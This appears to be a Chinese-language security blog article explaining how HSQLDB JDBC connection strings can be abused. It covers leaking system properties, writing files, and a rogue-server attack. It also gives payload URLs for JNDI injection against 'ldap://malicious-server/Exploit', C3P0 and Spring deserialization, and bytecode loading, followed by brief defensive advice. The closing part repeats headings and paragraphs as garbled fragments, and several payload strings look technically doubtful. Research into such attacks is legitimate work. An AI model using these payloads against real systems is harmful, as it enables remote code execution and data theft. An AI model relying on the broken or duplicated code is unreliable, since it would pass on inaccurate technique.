基于HSQLDB的JDBC攻击利用手法详解<\/h1>

前言<\/h2>
HSQLDB（HyperSQL Database）是一个轻量级的关系型数据库，支持JDBC连接。在特定配置下，HSQLDB的JDBC连接字符串可能被恶意利用，导致信息泄露、文件写入、甚至远程代码执行（RCE）。本文详细分析基于HSQLDB的JDBC攻击利用手法。<\/p>

1. 读取敏感信息<\/h2>

漏洞原理<\/h3>
HSQLDB的JDBC URL解析支持`${}<\/code>语法，用于动态获取系统属性。攻击者可通过构造包含${property}<\/code>的URL，使服务器调用System.getProperty()<\/code>读取敏感信息。<\/p>`

测试代码<\/h3>
\/\/ 示例：通过JDBC URL读取Java版本
<\/span><\/span><\/span><\/span>String url =<\/span> "jdbc:hsqldb:mem:test;${java.version}"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre>利用效果<\/h3>

服务器解析URL时，会执行System.getProperty("java.version")<\/code>，返回Java版本信息。<\/li>
可读取其他系统属性（如user.home<\/code>、os.name<\/code>等）。<\/li>
<\/ul>
调试分析<\/h3>

解析URL时，HSQLDB会调用PropertyExpander.expand()<\/code>处理${}<\/code>占位符。<\/li>
内部通过System.getProperty()<\/code>获取实际值，导致信息泄露。<\/li>
<\/ul>

2. 写入文件<\/h2>
文件模式特性<\/h3>
HSQLDB在文件模式（File Mode）下会生成以下文件：<\/p>

.script<\/code>：存储表结构和数据的SQL语句。<\/li>
.log<\/code>：事务日志。<\/li>
.properties<\/code>：数据库配置。<\/li>
.data<\/code>（可选）：二进制表数据。<\/li>
<\/ul>
利用方法<\/h3>
通过JDBC URL指定文件路径，强制HSQLDB生成文件：<\/p>
String url =<\/span> "jdbc:hsqldb:file:\/path\/to\/malicious_db;"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre>敏感信息泄露<\/h3>

.script<\/code>文件中可能包含数据库用户密码（哈希加密形式）。<\/li>
攻击者可获取哈希并尝试碰撞破解。<\/li>
<\/ul>

3. 命令执行<\/h2>
前提条件<\/h3>

攻击者需伪造恶意HSQLDB服务端。<\/li>
目标应用使用可控的JDBC URL连接恶意服务。<\/li>
<\/ul>
利用方法<\/h3>

启动恶意HSQLDB服务端（如使用工具hsqldb_rogue_server<\/code>）。<\/li>
构造JDBC URL指向恶意服务：
String url =<\/span> "jdbc:hsqldb:hsql:\/\/malicious-server:9001\/test"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
恶意服务端可响应恶意Payload，触发静态方法调用。<\/li>
<\/ol>
限制<\/h3>

仅能调用静态方法（如java.lang.Runtime.getRuntime().exec()<\/code>）。<\/li>
<\/ul>

4. JNDI注入<\/h2>
利用条件<\/h3>

环境中存在JNDI依赖（如javax.naming.InitialContext<\/code>）。<\/li>
可调用静态方法InitialContext.doLookup()<\/code>。<\/li>
<\/ul>
攻击步骤<\/h3>

启动恶意JNDI服务（如使用工具marshalsec<\/code>）。<\/li>
通过HSQLDB触发JNDI查找：
\/\/ 示例：调用JNDI lookup
<\/span><\/span><\/span><\/span>String url =<\/span> "jdbc:hsqldb:mem:test;{call javax.naming.InitialContext.doLookup('ldap:\/\/malicious-server\/Exploit')}"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
目标服务器加载远程恶意类，触发RCE。<\/li>
<\/ol>
高版本JDK绕过<\/h3>

JDK 11+需结合其他链（如Jackson反序列化）绕过JNDI限制。<\/li>
<\/ul>

5. 配合C3P0二次反序列化<\/h2>
利用条件<\/h3>

环境中存在C3P0依赖。<\/li>
可通过initConnectionSqls<\/code>等字段传入序列化数据。<\/li>
<\/ul>
漏洞原理<\/h3>

C3P0的C3P0ImplUtils.fromByteArray()<\/code>方法会反序列化字节数组。<\/li>
HSQLDB可触发该反序列化过程。<\/li>
<\/ul>
攻击步骤<\/h3>

生成恶意序列化Payload（如使用Jackson链）。<\/li>
通过JDBC URL触发C3P0反序列化：
String url =<\/span> "jdbc:hsqldb:mem:test;{call com.mchange.v2.c3p0.impl.C3P0ImplUtils.fromByteArray(<malicious_byte_array>)}"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
触发二次反序列化，执行RCE。<\/li>
<\/ol>

6. 加载字节码RCE<\/h2>
利用条件<\/h3>

环境中存在Spring AOP依赖（含ReflectUtils<\/code>类）。<\/li>
<\/ul>
攻击方法<\/h3>

调用org.springframework.util.ReflectUtils<\/code>的静态方法加载字节码：
String url =<\/span> "jdbc:hsqldb:mem:test;{call org.springframework.util.ReflectUtils.defineClass('MaliciousClass', <bytecode>, ClassLoader.getSystemClassLoader())}"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>

7. 二次反序列化（Spring）<\/h2>
利用条件<\/h3>

环境中存在Spring Core依赖。<\/li>
<\/ul>
攻击方法<\/h3>

调用SerializationUtils.deserialize()<\/code>反序列化数据：
String url =<\/span> "jdbc:hsqldb:mem:test;{call org.springframework.util.SerializationUtils.deserialize(<malicious_byte_array>)}"<\/span>;<\/span>
<\/span><\/span>Connection conn =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>url);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>

防御建议<\/h2>

禁止动态JDBC URL<\/strong>：避免用户控制JDBC连接参数。<\/li>
输入过滤<\/strong>：对JDBC URL中的${}<\/code>和{}<\/code>进行转义或拦截。<\/li>
依赖管理<\/strong>：移除不必要的依赖（如C3P0、Spring AOP）。<\/li>
网络隔离<\/strong>：限制数据库服务出网流量。<\/li>
<\/ol>

参考<\/h2>

HSQLDB JDBC攻击原理解析<\/a><\/li>
工具：hsqldb_rogue_server<\/code>、marshalsec<\/code><\/li>
<\/ul>

免责声明<\/strong>：本文仅用于安全研究目的，请勿用于非法用途。<\/p>

基于HSQLDB的JDBC攻击利用手法详解<\/h1>

1. 读取敏感信息<\/h2>

漏洞原理<\/h3> HSQLDB的JDBC URL解析支持${}<\/code>语法，用于动态获取系统属性。攻击者可通过构造包含${property}<\/code>的URL，使服务器调用System.getProperty()<\/code>读取敏感信息。<\/p>

2. 写入文件<\/h2>

3. 命令执行<\/h2>

4. JNDI注入<\/h2>

5. 配合C3P0二次反序列化<\/h2>

6. 加载字节码RCE<\/h2>

7. 二次反序列化（Spring）<\/h2>

参考<\/h2> HSQLDB JDBC攻击原理解析<\/a><\/li> 工具：hsqldb_rogue_server<\/code>、marshalsec<\/code><\/li> <\/ul> 免责声明<\/strong>：本文仅用于安全研究目的，请勿用于非法用途。<\/p>

漏洞原理<\/h3>
HSQLDB的JDBC URL解析支持`${}<\/code>语法，用于动态获取系统属性。攻击者可通过构造包含${property}<\/code>的URL，使服务器调用System.getProperty()<\/code>读取敏感信息。<\/p>`

参考<\/h2>

HSQLDB JDBC攻击原理解析<\/a><\/li>
工具：`hsqldb_rogue_server<\/code>、marshalsec<\/code><\/li> <\/ul> 免责声明<\/strong>：本文仅用于安全研究目的，请勿用于非法用途。<\/p>`